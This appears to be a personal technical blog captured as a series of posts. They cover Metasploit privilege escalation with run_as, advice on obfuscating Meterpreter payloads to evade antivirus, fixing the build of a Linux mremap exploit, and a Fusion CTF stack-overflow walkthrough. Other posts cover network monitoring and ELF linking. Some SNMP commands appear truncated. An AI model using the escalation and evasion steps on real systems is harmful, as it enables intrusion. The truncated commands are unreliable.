Pentesting: Runas – How to elevate the same command prompt from user to admin in Windows


The search that most likely brought you here was something to the effect of: how to elevate the same command prompt from user to admin in Windows. For me, this was surprisingly annoying, and I wasted a lot more time than I expected tracking down a solution to this particular problem.

It’s a deceptively simple task, and the short answer to your question is: depending on the scenario, you can’t – but there are ways around it. As the title alludes, this is unfortunately not a post about how to elevate your privileges in the same command prompt legitimately, but how to do so in a pentesting scenario. (Although if you are a legit admin, you can set things up so you can do it with psexec.)


The Scenario

You are pentesting something and you can get command line access to a server as a user. You have administrative credentials, but you only have access to your one user shell and you want to elevate to administrator/system.

How to Do It

Fortunately, it’s pretty straightforward. The first thing you have to do is get a Meterpreter shell running on the computer. You may run into AV, and if that’s the case you’ll need to obfuscate your Meterpreter payload somehow. Fortunately this is pretty easy to do: something like Veil will do the trick, but really any non-Metasploit crypter/obfuscation typically works. All the AV vendors have signatures for the built-in Metasploit encoders, so those tend to be fairly ineffective.

Once you have your meterpreter session running you can use a module called post/windows/manage/run_as. The options will look something like this:

Name      Current Setting                  Required  Description
----      ---------------                  --------  -----------
CMD       <YOUR_METERPRETER_PAYLOAD>       yes       Command to execute
CMDOUT    false                            yes       Retrieve command output
DOMAIN    workgroup                        yes       Domain to login with
PASSWORD  <ADMIN_PASSWORD>                 yes       Password to login with
SESSION   <YOUR_USER_METERPRETER_SESSION>  yes       The session to run this module on
USER      <ADMIN_USERNAME>                 yes       Username to login with

CMD can be anything you want to run as the administrator, but I typically just rerun my Meterpreter payload to upgrade it to admin level and go from there.
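For reference, a minimal msfconsole session using the module might look like the following sketch; the session number and payload path are placeholders you would substitute with your own:

msf > use post/windows/manage/run_as
msf post(run_as) > set SESSION 1
msf post(run_as) > set DOMAIN workgroup
msf post(run_as) > set USER <ADMIN_USERNAME>
msf post(run_as) > set PASSWORD <ADMIN_PASSWORD>
msf post(run_as) > set CMD C:\Users\Public\payload.exe
msf post(run_as) > run

Once the rerun payload connects back, you get a second Meterpreter session, this time running as the administrator.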

How to: Unicode in URL with Python 3


I found this to be much more difficult than I thought it would be. The fix itself is simple, but finding it was a bit of a pain. Here it is:

from urllib.parse import quote
from urllib.request import urlopen

# quote() percent-encodes the non-ASCII characters so the final URL is pure ASCII
url_string = "http://your_site_here" + quote(SOME_STRING_WITH_UNICODE)
html = urlopen(url_string).read().decode('utf-8')

Extremely simple, but it caused me a fair amount of headache to figure that out.
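If you want to see what quote() actually does to non-ASCII characters before wiring it into a request, a quick check from the shell (assuming python3 is on your PATH) looks like this:

$ python3 -c 'from urllib.parse import quote; print(quote("caf\u00e9/ni\u00f1o"))'
caf%C3%A9/ni%C3%B1o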

Common errors that might bring you to this post:

AttributeError: 'bytes' object has no attribute 'timeout'
TypeError: Can't convert 'bytes' object to str implicitly
UnicodeEncodeError: 'ascii' codec can't encode character '\xf3' in position 6: ordinal not in range(128)
TypeError: a bytes-like object is required, not 'str'
TypeError: expected bytes-like object, not str


Fixing asm: Internal error: unbalanced parenthesis in operand 1


I got this error the other day when I was trying to compile the exploit code for the mremap exploit on Linux. While I have programmed a lot, I have not spent much time with gcc, and this was something of a pain to solve, so I thought I would share a general solution.

1.) Begin by getting a dump of the assembly code. You can do this with gcc -S -o <name_of_output> <name_of_input>

2.) Go to the line the compiler flagged. Now you can see what the problem is. In my case, the assembler came up with movl $((17, which obviously has unbalanced parentheses.

3.) You can either directly modify the assembly, or trace it back to the source file. In my case, it was inline assembly, and a search on the corresponding function name led me to the offending line: "movl $("xstr(CLONEFL)"), %%ebx \n". It was a macro, which looked fine. However, you can view the preprocessor output with the -E option. Examining the preprocessor output led me to the line: "movl $(""(17|0x00004000|0x00000100)""), %%ebx \n". I'm not sure why that doesn't work, but I simply changed it to "movl $0x4111, %%ebx \n" (the same three values OR'd together by hand) and it worked.
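Put together, the whole inspection workflow looks roughly like this (exploit.c stands in for whatever file fails to build):

# 1.) dump the generated assembly instead of assembling it
gcc -S -o exploit.s exploit.c

# 3.) dump the preprocessor output to see what the macros expand to
gcc -E exploit.c -o exploit.i
grep -n movl exploit.i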

Hope this saves someone some time. Feel free to comment if you have more specific questions.

Connect GNS3 to ESXi



As far as I can tell, there's no great way to make this happen. To give you an image up front, below is a diagram of what I did. It may seem daunting at first, but I'll explain as we go along.


Set Up Description

My GNS3 server is running on a VM on my ESXi host. In my case, I was running GNS3 on top of Ubuntu 15.10. My GNS3 server has four interfaces relevant to this problem. Interface eno16777984 connects from the VM to the default vSwitch0, which has access to the ESXi server's one real network interface card. Interface eno33557248 connects to a second virtual switch I created, vSwitch1. This is the switch to which I connected the virtual machines I wanted to connect into my GNS3 topology. The interface tap1 is a loopback interface on the GNS3 server, which I used to connect into my GNS3 topology. Interface br0 bridges the tap1 interface to interface eno33557248. The bridge thus connects the virtual network created by vSwitch1 to my GNS3 topology.

Flow summary: VM hosted on ESXi -> vSwitch1 -> eno33557248 (GNS3 server) -> br0 (GNS3 server) -> tap1 (GNS3 server) -> GNS3 cloud

Apology: Sorry about the wonky interface names. Not sure why ESXi causes Ubuntu to generate such bizarre names.


The limitation of this solution is that you may have to implement it multiple times if you want to connect different ESXi VMs into different locations within your GNS3 topology. For example, vSwitch1 could be used to service all the DMZ machines in a GNS3 topology. However, if you want to plug the ESXi VMs into a different location, say at the access layer, you will need to set up another iteration of this solution in its totality.

Configure ESXi Server

  1. Select your ESXi server, go to configuration->Networking
  2. Click Add Networking, Virtual Machine, Create a vSphere standard switch, label it and put it in a VLAN – I used VLAN 2, click finish
  3. On your GNS3 server, add a virtual NIC which is connected to your newly created vSwitch
  4. On your newly created vSwitch go to Properties, highlight your newly created network (the one you named, not the one that says vSwitch), click Edit, go to Security, check the box next to Promiscuous Mode, and change the setting to Accept. This setting is not ideal and this technique should not be used in production networks; it essentially turns the vSwitch into a hub. I didn't delve into the issue in depth, but I noticed the vSwitch does not handle bridged traffic properly: it will forward layer 2 traffic, but not layer 3. This setting is required for the bridge we create later on to work. As best I can tell, the vSwitch doesn't learn the MAC addresses from the other network, so it doesn't forward destination traffic properly.


My final configuration looked like this:


Configure GNS3 Server Interfaces

This is the tricky part of the operation. Credit goes to knowosielski for his post here for illustrating how to connect an interface into the GNS3 topology.

Create a Virtual Interface

  1. Create a shell script with the following content and put it in a location of your choice (e.g. /scripts/<SCRIPT_NAME>)


#!/bin/bash

# Create TAP1, owned by the user who needs access to it
tunctl -u husband

# Bring TAP1 up
ifconfig tap1 up

WARNING: Your tap interface may come up as tap0. That's fine. When I set this up, I already had a tap0, so mine came up as tap1. If yours comes up as tap0, simply adjust the following steps accordingly.

  2. Modify the line “tunctl -u husband” and replace “husband” with the user name that should have access to the interface.
  3. Save the script and make it executable with chmod +x <SCRIPT_NAME>
  4. Test the script by running it, then do an ifconfig and make sure tap1 is there. (Reminder: yours may come up as tap0; adjust the steps accordingly if this is the case.)
  5. Modify /etc/rc.local to run this script every time the system starts. Add the line sudo <PATH_TO_SCRIPT>/<NAME_OF_SCRIPT> BEFORE the line exit 0. If you do not add the line before exit 0, it will not work. In mine, I added the line sudo /home/husband/GNS3/script/tap
  6. Consider testing to make sure everything works by rebooting the system.

Create the Bridge Interface

  1. If you don’t already have them, run sudo apt-get install bridge-utils
  2. Run sudo vim /etc/network/interfaces and add the line auto eno33557248, or whatever the name of your VM's second interface is. This should be the interface which resides in your newly created ESXi virtual network, which in my case was on vSwitch1.
  3. Now add the following lines:

# Bridge between tap1 and eno33557248
auto br0
iface br0 inet manual
bridge_ports tap1 eno33557248
bridge_stp off

  4. At this juncture, I strongly recommend you reboot and make sure that everything works; a quick sanity check is sketched below. If you skip this, troubleshooting down the line will probably be more challenging.
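A minimal check after the reboot (the interface names are mine; substitute your own):

# the bridge should list both member interfaces
brctl show br0

# the tap, the second NIC, and the bridge should all show as UP
ifconfig tap1
ifconfig eno33557248
ifconfig br0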

Configure GNS3

Now we’ll configure GNS3 itself. My setup was very simple for the sake of making sure everything works:


  1. In GNS3 click “Browse all devices” and drop the cloud into your topology
  2. Right click on the cloud and select configure
  3. Go to the tap tab, type tap1 (or whatever your tap interface is named), and click add


Now just drop a device in and connect it to the cloud and you should be up and running. I also tested this with the GNS3 ethernet switch and it worked fine. See screenshot below. This is a separate Ubuntu 15.10 server residing on my newly created ESXi vSwitch1, pinging through my GNS3 server and into the GNS3 topology.


This setup took me a really long time (especially the bit with promiscuous mode – that took forever to figure out). If you have any questions, feel free to comment.

Receive SNMP Traps with Icinga 2 on Ubuntu/Debian




I’m warning you up front, making this happen is a pain if you’re new to Icinga. I did my best to account for every nuance I ran into, but you may find something else. Feel free to comment if you need help.


Unfortunately, there is no official way for Icinga to receive SNMP traps. However, there is a pseudo-official hack everyone uses to make it happen. Icinga is not meant to be a replacement for a full-scale SNMP management suite; however, it can do a pretty good job. I originally wrote this as a Word document and moved it over, so the indents on the numbering below may be slightly off, but it's all in the correct order.

Flow Synopsis

We’ll use a couple of programs in conjunction to make this happen. The device will generate SNMP traps and send them to the SNMP server, which in our example resides on the same box as Icinga. We will use snmptrapd as our SNMP trap server. We will configure the snmptrapd service with an SNMP trap handler. When snmptrapd receives an SNMP trap, it will forward the trap to the SNMP trap handler. In our case, we will use snmptt as the handler. This tool translates SNMP traps from an SNMP OID (more information here) to a meaningful set of text which represents the trap. snmptt will use an executable statement to determine what to do for that trap. Each trap will have a configurable executable statement (you can use wildcards).

In order to get Icinga to receive the alert, our executable statements in snmptt will call an Icinga event handler. This event handler will report the SNMP trap to a running Icinga service, which is what you’ll actually be able to see in Icinga itself.

Set up the SNMP Trap Daemon

Recall, the SNMP trap daemon is responsible for receiving SNMP traps from the target host.

  1. Start by installing the daemon itself with sudo apt-get install snmpd
  2. Edit the configuration for snmptrapd by running the following commands:
    1. vim /etc/snmp/snmptrapd.conf
    2. Add the following two lines. The traphandle line tells snmptrapd to feed any traps it receives to the /usr/sbin/snmptthandler program, which is part of the snmptt suite of tools we will install next. disableAuthorization yes tells snmptrapd not to screen incoming SNMP traps; you could instead configure snmptrapd to only accept SNMP traps from certain devices.
      1. traphandle default /usr/sbin/snmptthandler
      2. disableAuthorization yes
    3. The snmptrapd service script does not run properly. I haven't taken the time to troubleshoot it, but if you start the daemon by hand with snmptrapd -On -Lsd -p /var/run/ it runs fine.
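Before moving on, it's worth confirming that snmptrapd actually receives traps. A quick sketch, assuming the net-snmp command line tools are installed and snmptrapd is running with the flags above, is to send yourself a test trap (the OID is the stock net-snmp example heartbeat notification):

snmptrap -v 2c -c public localhost '' .1.3.6.1.4.1.8072.2.3.0.1

With -Lsd the daemon logs to syslog, so the trap should show up there if everything is wired correctly.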

Configure SNMPTT

SNMPTT will take the trap from snmptrapd (the trap handler) and convert it to a meaningful message which we can send to Icinga.

  1. Steps 1-3 describe manual installation of SNMPTT. This is usually not necessary; if you are not installing manually, skip to step 4. Download SNMPTT. You can download it from the command line with wget. The file will download with a strange name, but it works if renamed to <anything>.tgz. Alternatively, download it from their home page here.
  2. Run the following commands to install SNMPTT
    1. sudo cp snmptt snmptthandler /usr/sbin/
    2. sudo chmod +x /usr/sbin/snmptt /usr/sbin/snmptthandler
    3. sudo cp snmptt.ini /etc/snmp/
    4. sudo cp snmpttconvertmib /usr/sbin
    5. sudo groupadd snmptt
    6. sudo useradd -g snmptt snmptt
    7. sudo chown snmptt:snmptt /etc/snmp/snmptt.ini
    8. sudo mkdir /var/spool/snmptt
    9. sudo chown snmptt:snmptt /var/spool/snmptt/
    10. sudo vim /etc/snmp/snmptt.ini
      1. Change the line mode = standalone to mode=daemon
      2. If you want to change the DNS settings, change the line dns_enable = 0 to dns_enable = 1 and set strip_domain to 1
      3. Set syslog_enable to 0 if you do not have syslog set up
  3. Fix missing perl dependencies by running the following commands (SNMPTT ships without them, so they must be installed):
    1. sudo cpan install List::Util
    2. sudo cpan install Config::IniFiles
  4. Install SNMPTT by running the command sudo apt-get install snmptt
  5. Install the MIBs you would like to monitor
    1. sudo mkdir ~/.snmp
    2. sudo mkdir ~/.snmp/mibs. We create this folder because we are going to use the snmptranslate tool to take the .my files we download and translate them into usable statements for the SNMPTT tool. The snmptranslate tool checks two directories for MIB files: $HOME/.snmp/mibs and /usr/local/share/snmp/mibs.
    3. Download the .my files from the web. For my server, I used the Cisco MIB files, which can be downloaded from Cisco's site. Change to the directory above and then run wget against that URL.
      1. If using the files from Cisco, simply extract the archive and then move all the .my files from the extracted folder to ~/.snmp/mibs
    4. Create a script to convert all of the MIB files to usable SNMPTT data
      1. vim <SCRIPT_NAME>
      2. Add the following lines to the script. Where it says <YOUR-SERVICE-NAME>, this is the name of the service which Icinga will run to receive the SNMP traps. In my case, I named the service snmp_traps; the name can be anything. This script runs the snmpttconvertmib command on every .my file in the target folder.

#!/bin/bash
# run snmpttconvertmib on every .my file in the current folder
for f in *.my
do
  echo "Processing $f"
  # arguments after $r reconstructed to match the catchall EXEC in step 9
  snmpttconvertmib --in=$f --out=/etc/snmp/snmptt.conf \
    --exec='/usr/lib/nagios/plugins/submit_check_result_2 $r <YOUR-SERVICE-NAME> 2 "$O: $1 $2 $3 $4 $5"'
done

  6. Save the following script as submit_check_result_2 in /usr/lib/nagios/plugins/. This script is what the --exec line in the above script points to. The above script modifies snmptt.conf, which will contain a series of EXEC statements; an EXEC statement runs any time SNMPTT receives a trap matching the clause for that statement. The script below actually submits the trap to Icinga.

#!/bin/sh
# Written by Ethan Galstad
# Last Modified: 26 Oct 15
# This script will write a command to the Nagios command
# file to cause Nagios to process a passive service check
# result.  Note: This script is intended to be run on the
# same host that is running Nagios.  If you want to
# submit passive check results from a remote machine, look
# at using the nsca addon.

# Arguments:
#  $1 = host_name (Short name of host that the service is
#       associated with)
#  $2 = svc_description (Description of the service)
#  $3 = return_code (An integer that determines the state
#       of the service check, 0=OK, 1=WARNING, 2=CRITICAL,
#       3=UNKNOWN)
#  $4 = plugin_output (A text string that should be used
#       as the plugin output for the service check)

# echo binary and the Icinga 2 command file (path per the next section)
echocmd="/bin/echo"
CommandFile="/var/run/icinga2/cmd/icinga2.cmd"

# get the current date/time in seconds since UNIX epoch
datetime=`date +%s`
# create the command line to add to the command file
cmdline="[$datetime] PROCESS_SERVICE_CHECK_RESULT;$1;$2;$3;$4"
# append the command to the end of the command file
`$echocmd $cmdline >> $CommandFile`

  7. Run the command sudo chmod +x /usr/lib/nagios/plugins/submit_check_result_2
  8. Navigate to ~/.snmp/mibs and run the conversion script you created above from within the folder. The script will process all the .my files in the directory. Some may fail; depending on which MIBs you downloaded, that's fine, as not all entries will be processed. You can confirm the command ran successfully by checking the file /etc/snmp/snmptt.conf; the processed entries should appear there.
  9. (Optional) Add a catchall definition by adding the following lines to your snmptt.conf file (note the EXEC path should point at wherever you installed submit_check_result_2):

EVENT CatchAll .1.* "SNMP Traps" Critical
EXEC /usr/lib/nagios/plugins/submit_check_result_2 "$r" "snmp_traps" 2 "$O: $1 $2 $3 $4 $5"

  10. Run SNMPTT with the command sudo /usr/sbin/snmptt --daemon --debug=1 --debugfile=/var/log/snmptt.log. Note: this is only necessary for manual installs, or if you do not have it installed as a service. If you installed it via aptitude, skip to step 11.
  11. Run SNMPTT with sudo service snmptt start
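At this point you can test the snmptrapd-to-SNMPTT leg of the pipeline. A rough sketch, reusing the earlier test trap:

# hand snmptrapd a test trap...
snmptrap -v 2c -c public localhost '' .1.3.6.1.4.1.8072.2.3.0.1

# ...snmptthandler drops the raw trap into the spool directory...
ls /var/spool/snmptt/

# ...and the snmptt daemon should log what it did with it
tail /var/log/snmptt.log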

Configure Icinga 2 to Receive the Alerts

Icinga receives the alert from SNMPTT via the command file at /var/run/icinga2/cmd/icinga2.cmd. We will use a passive service to check this file for new SNMP traps and then Icinga will report them.

  1. Edit the Icinga2 template file at /etc/icinga2/conf.d/templates.conf with vim /etc/icinga2/conf.d/templates.conf
  2. Add the following template to the file:

template Service "snmp-trap-service" {
  import "generic-service"
  check_command         = "passive"
  enable_notifications  = 1
  enable_active_checks  = 1
  enable_passive_checks = 1
  enable_flapping       = 0
  volatile              = 1
  max_check_attempts    = 1
  check_interval        = 87000
  enable_perfdata       = 0
  vars.sla              = "24x7"
  vars.dummy_state      = 2
  vars.dummy_text       = "No passive check result received."
}

apply Service "snmp_traps" {
  import "snmp-trap-service"
  assign where host.address
}

  3. In the snmp_traps service apply statement, the configuration applies the snmp-trap-service to every host that has an address defined; Icinga provides more details here.
  4. This configuration only works if the host name configured for the Host object is the same as the host name in the incoming SNMP trap. If the two do not match, Icinga will discard the trap. In my configuration, my Cisco 1721 sent its IP address as its host name, so the Host object in my Icinga configuration had to be named with that same value (object Host "<TRAP_HOST_NAME>" { ... }).
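If traps still aren't showing up, you can take SNMPTT out of the loop entirely and write a passive check result into the command file by hand, which is exactly what submit_check_result_2 does (myhost is a placeholder for a host defined in your Icinga configuration):

echo "[`date +%s`] PROCESS_SERVICE_CHECK_RESULT;myhost;snmp_traps;2;manual test trap" >> /var/run/icinga2/cmd/icinga2.cmd

If the snmp_traps service on myhost goes critical with that text, the Icinga side works and the problem is upstream in snmptrapd/SNMPTT.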

Icinga "did not exit properly" error


I got this and it took some time to troubleshoot. The error is misleading. What it's really telling you is that the plugin failed to execute properly. Here's the catch: this includes warnings. So if you manually test the plugin from the command line outside of Icinga and it works but gives a warning, it will still fail when run from Icinga and throw the aforementioned error. To fix the problem, you have to fix whatever is in the code giving the warning.

Netint Plugin throws did not exit properly error

This was the specific problem I was having trouble with. I ran the plugin on the command line and got errors about an uninitialized variable. On line 2023 you'll see a line with the variable $oid_perf_inoct; that is the offending variable. You need to add an additional if statement outside this one. Enclose the whole thing in an if block:

if (defined $oid_perf_inoct[$i]) {
    # ... all that other stuff from the if block on line 2023 ...
}

It worked for me after that.

Configuring Icinga for Cisco SNMP


Original Error: “CRITICAL – Plugin timed out while executing system call”

I had a bit of trouble getting this to work, so I thought I would share my solution. I initially followed the tutorial here. I basically wanted Icinga to receive SNMP data from a Cisco 7200 I had set up.

To begin, set up your Cisco router according to this tutorial.

You can then begin setting up your monitoring services according to the tutorial I listed above.

Here’s where it differs. I found that the line:

check_command check_snmp!-C public -o sysUpTime.0

did not work. I discovered you can test the plugins manually by migrating to your plugin directory and doing something like the following:

/usr/lib/nagios/plugins/check_snmp <COMMAND ARGUMENTS HERE>

In this way, if you want to try something new, you can run it manually first to see if it works.
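For example, a manual sysUpTime query against the router looks something like this (the IP and community string are placeholders; this is the same numeric OID used in the working config below):

/usr/lib/nagios/plugins/check_snmp -H -P 2c -C public -o .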

I could not get a named identifier to work with the command so I ended up using the following in my config for Icinga:

check_command     check_snmp!-H <IP_ADDRESS_of_TARGET_HOST> -P 2c -C <COMMUNITY_STRING_HERE> -o .

The numbers at the end are the OID tree value corresponding to sysUpTime. You can view the tree here. You may notice there is an additional 0 at the end; this is the index number.


Stop Ubuntu 14.04 VPN From Dying

The title of my post is a bit misleading, but this is my solution to the problem. I found that my VPN would randomly die on Ubuntu: I could ping the internal network, but everything external was dead. What I did was add a cron job which checks every minute whether the interface is up and, if it isn't, restarts the VPN.

Type: sudo crontab -e

Add the line:

* * * * * if !(grep -q <VPN_INTERFACE_NAME> /proc/net/dev); then nmcli con up id <VPN_NAME>; fi

You can check a list of your interface names with nmcli con; see the dry run below. The line basically says: check if my VPN interface appears in the list of active interfaces, and if it doesn't, bring the VPN up.
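You can test the check outside of cron first; tun0 and MyVPN are placeholders for your own interface and connection names:

# the same test the cron job runs: bring the VPN up if its interface is missing
if !(grep -q tun0 /proc/net/dev); then nmcli con up id MyVPN; fi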

Hope this helps.

What is the Symbol Table and What is the Global Offset Table?



When I first sought to understand the symbol table and the global offset table (GOT), I found bits and pieces of information, but I had trouble getting the whole picture. As I came to understand what they are, I realized it is easier to describe the symbol table and GOT in the context of the linking and loading process in which they are used. That's what this post does: it explains the why of the symbol table and GOT to help you understand them in context.

Most of the credit goes to the authors of the posts this one is an amalgamation of. This is more a collection of pieces of information, assembled to hopefully paint a clearer picture of the whole.

The Linking Process

If you aren’t already familiar with the C++ compilation process see this and this (they’re short :-D). You’ll need to understand that to understand this.

Relocation Records

Object files contain references to each other’s code and data. Due to this, the linker must combine them at link time. After linking all of the object files together, the linker uses the relocation records to find all of the addresses that need to be filled in.

The Symbol Table

Since assembling to machine code removes all traces of labels from the code, the object file format has to keep these around in a different place.  It does this in the form of the symbol table, a list of names and their corresponding offsets in the text and data segments. (Source)

To recap an important concept: an executable file is made up of several object files. You might have two object files and a C library that are all combined by the linker at link time into one executable file.
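You can look at a symbol table yourself with the nm tool. A minimal sketch, assuming a trivial hello.c that defines main and calls printf:

gcc -c hello.c -o hello.o
nm hello.o

The output will contain lines along the lines of "0000000000000000 T main" and "U printf": T marks a symbol defined in the text section at the given offset, and U marks a symbol that is undefined in this object file and must be filled in by the linker.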

Shared Objects

Most systems run a number of programs at any given time. If you're familiar with programming, it probably comes as no surprise to you that these programs each use many of the same libraries. For example, many programs use the standard C library, which exports functions like printf and malloc. Naturally, we must then have a copy of the C library within the running memory of each of these programs. After all, I said earlier that we combine object files and libraries to create executable files. However, this is a mammoth waste of resources, so instead each program holds a reference to this common library rather than its own copy.

Static Linking vs Dynamic Linking

In a statically linked scenario a program and the particular library it is using are combined by the linker at link time. By contrast, a dynamically linked library (in Windows a .dll file and in Linux a .so file) is linked when the executable runs.

The linker binds statically linked libraries with the program at link time (which comes directly after compilation/assembly). The largest advantage of static linking is that you can be certain what version of the library is present. This means that DLL Hell/Dependency Hell isn't a problem for statically linked executables. It also means the executable exists as a single file rather than several files. Additionally, a statically linked executable contains only those parts of the library it needs to execute, whereas dynamically linked libraries must load the entire library at runtime because it is not known in advance which functions the application will invoke.

On the downside, statically linked executables are much larger because they carry with them all of their library code. Additionally, in order to update the executable you must recompile/link it.

The term ‘dynamically linked’ means that the program and the particular library it references are not combined together by the linker at link time. Instead, the linker places information into the executable that tells the loader which shared object module the code is in and which runtime linker should be used to find and bind the references. (Source) This means the shared object is found and bound to the executable at runtime. This type of program is also called a partially bound executable because it isn't fully bound at link time: the linker did not resolve all the referenced symbols, it only placed references to the shared objects in the executable. There are four main advantages to using dynamically linked executables.

  1. The executable is smaller
  2. Libraries may be upgraded or patched without having to relink all of the executables which depend on them. In the same vein, you don’t have to distribute the source code of the libraries – you only need the compiled binary version.
  3. Programmers must only deliver the unique libraries with their code. The programmer may assume that standard libraries will already be on the system.
  4. When combined with virtual memory, dynamic linking permits two or more processes to share read-only executable code, such as the standard C library or the kernel. This means memory need hold only one copy of the library rather than one for each process.

The Executable and Linkable Format (ELF) File Format

I’ll start by saying if you’re on Windows you’ll be using the PE/COFF file format. Most of the principles explained here conceptually port over to the PE/COFF format.

In order to fully understand shared objects, the symbol table, and the GOT, you have to understand the ELF file format. The ELF specification defines the layout of an object file and its subsequent executable. It is the way executables are standardized across systems; in the case of the ELF format, typically Linux systems. The ELF file format is fairly complicated and you can read about it in extreme detail here. In this post, I will settle for the parts relevant to the symbol table and the GOT.

Section vs Segment

Within the ELF format there are two ways to view an object file/executable: the linking view or the execution view. Below is a diagram comparing the two.



ELF uses the link view at static linking time for relocatable file combination and the execution view at run time to load and execute programs. The linking view by and large deals with sections whereas the execution view deals with segments. Sections provide the information needed at link time and segments the information needed at runtime.

Sections have a name and type, a requested memory location at run time, and permissions. You can locate the sections by examining the section header table. Each section:

  • has one section header describing it (section headers may also exist without a section)
  • occupies one contiguous (possibly empty) sequence of bytes within the file
  • will not overlap with any other section
  • may have inactive space: the various headers and the sections might not cover every byte in an object file

Segments group related sections. For example, the text segment groups executable code, the data segment groups the program data, and the dynamic segment groups information relevant to dynamic loading. Each segment consists of one or more sections. In this post, we are primarily interested in the PT_DYNAMIC type segment.

Process Image and the Dynamic Linker

The process image is created by loading and interpreting the segments. When building an executable file that uses dynamic linking, the link editor adds a program header element of type PT_INTERP to an executable file, telling the system to invoke the dynamic linker as the program interpreter. The dynamic linker creates the process image for a program.  At link time, the program or library is built by merging together sections with similar attributes into segments. Typically, all the executable and read-only data sections are combined into a single text segment, while the data and BSS are combined into the data segment. These segments are normally called load segments, because they need to be loaded in memory at process creation. Other sections such as symbol information and debugging sections are merged into other, non-load segments. (Source)

Creating the process image entails the following activities (source):

  • Adding the executable file’s memory segments to the process image
  • Adding shared object memory segments to the process image
  • Performing relocations for the executable file and its shared objects
  • Closing the file descriptor that was used to read the executable file, if one was given to the dynamic linker
  • Transferring control to the program, making it look as if the program had received control directly from exec(BA_OS)

There are three sections we care about specifically in this post:

  • .dynamic: the structure residing at the beginning of the section holds the addresses of the other dynamic linking information.
  • .got: stores the addresses of system functions.
  • .plt (procedure linkage table): stores indirect links into the GOT.

Shared objects may occupy virtual memory addresses that are different from the addresses recorded in the file’s program header table. The dynamic linker relocates the memory image, updating absolute addresses before the application gains control. Although the absolute address values would be correct if the library were loaded at the addresses specified in the program header table, this normally is not the case.

The Global Offset Table (GOT)

The GOT is a table of addresses which resides in the data section. If an instruction in code wants to refer to a variable, it must normally use an absolute memory address. Instead of referring to the absolute memory address, it refers to an entry in the GOT, whose location is known: the relative location of the GOT from the instruction in question is constant.

Now you might be thinking, “Great, but I still have to resolve all those addresses within the GOT so what’s the point?” There are two things using the GOT gets us.

  1. Without it, we must relocate every reference in the code section. If everything is referenced through the GOT, we only have to update each address once, in the GOT. This is much more efficient.
  2. The data section is both writable and not shared between processes. Performing relocations in this section causes no harm, whereas relocations in the code section disallow sharing, which defeats the purpose of a shared library.
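You can see these GOT-populating relocations in any dynamically linked binary with readelf (/bin/ls is just a convenient stand-in):

# GLOB_DAT relocations fill GOT entries for data symbols;
# JUMP_SLOT relocations fill the GOT entries used by the PLT
readelf -r /bin/ls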

Here is an example I pulled from Eli Bendersky’s explanation:

In pseudo-assembly, we replace an absolute addressing instruction:

; Place the value of the variable in edx
mov edx, [ADDR_OF_VAR]

With displacement addressing from a register, along with an extra indirection:

; 1. Somehow get the address of the GOT into ebx
lea ebx, ADDR_OF_GOT

; 2. Suppose ADDR_OF_VAR is stored at offset 0x10
;    in the GOT. Then this will place ADDR_OF_VAR
;    into edx.
mov edx, DWORD PTR [ebx + 0x10]

; 3. Finally, access the variable and place its
;    value into edx.
mov edx, DWORD PTR [edx]

If you would like to see the rest of the process in a high level of detail, I strongly suggest taking a look at Eli Bendersky's article, under the section titled “PIC with data references through GOT – an example”.

This is straightforward enough for global variables, but what about function calls? Theoretically, things could work the same way, but they’re actually a bit more complicated.

The Procedure Linkage Table (PLT)

The PLT is part of the executable text section, containing an entry for each external function the shared library calls. Each PLT entry is a short chunk of executable code. Instead of calling the function directly, the code calls an entry in the PLT, which then calls the actual function. Each entry in the PLT also has a corresponding entry in the GOT which contains the actual offset to the function, but only after the dynamic loader has resolved it.

The PLT uses what is called lazy resolution: it won't actually resolve the address of a function until it absolutely has to. The process works in the following manner:

  1. A function func is called and the compiler translates this to a call to func@plt.
  2. The program jumps to the PLT. The PLT points to the GOT. If the function hasn’t been previously called, the GOT points back into the PLT to a resolver routine, otherwise it points to the function itself.
  3. If the function hasn't been previously called, the program jumps back from the GOT to the PLT, which then runs a resolver routine to update the GOT entry with the actual address of the function.

The reason we use this lazy initialization is that it saves us the trouble of resolving all the functions that aren’t actually used during runtime.
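To see this machinery in a binary itself, you can disassemble the PLT of any dynamically linked executable (again using /bin/ls as a stand-in):

# each PLT entry is an indirect jmp through its GOT slot, followed by
# the "push <reloc index>; jmp resolver" fallback used on the first call
objdump -d -j .plt /bin/ls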

Again, if you would like to see a specific example, I strongly recommend Eli Bendersky’s article. Look under the section “PIC with function calls through PLT and GOT – an example”



Fusion Exploit Challenges Level 01


Some GDB Housekeeping

When I first started this challenge, I was quite thrown off. I started debugging with GDB and my level00 exploit worked perfectly as is. In fact, after closer inspection I realized that none of the addresses from level00 were different in level01. I figured this wasn't a coincidence. After running my exploit against the binary outside of GDB and watching it fail, I guessed what was going on: GDB disables ASLR to make debugging easier. My first step was to turn randomization back on so I could see what was happening.

set disable-randomization off

If you have a previously running level01 which you opened with GDB at any point before using the disable-randomization command, you'll need to kill that instance of level01 and open a new one. Once GDB opens a process, it seems to rebase it.

Once I did that and reexamined the crash from level00 I saw that my return address took me to non-existent memory:

(gdb) c
[New process 15084]
[Switching to process 15084]

Breakpoint 1, 0x08049854 in fix_path (path=Cannot access memory at address 0x41414149
) at level01/level01.c:9
9 in level01/level01.c
(gdb) stepi
0xbffff3ec in ?? ()
(gdb) x/40x $eip
0xbffff3ec: Cannot access memory at address 0xbffff3ec

Poking Around

Our stack has indeed changed. Now we must find a way to make it to our shellcode. An examination of the stack pointer reveals the new location of our shellcode.

(gdb) x/300x $esp
0xbff0a7d0: 0xbff0a700 0x00000020 0x00000004 0x001761e4
0xbff0a7e0: 0x001761e4 0x000027d8 0x20544547 0x41414141
0xbff0a7f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a800: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a810: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a820: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a830: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a840: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a850: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a860: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a870: 0x41414141 0xec414141 0x00bffff3 0x50545448
0xbff0a880: 0x312e312f 0x43430a0d 0x43434343 0x43434343
0xbff0a890: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8a0: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8b0: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8c0: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8d0: 0x43434343 0x43434343 0x43434343 0x43434343
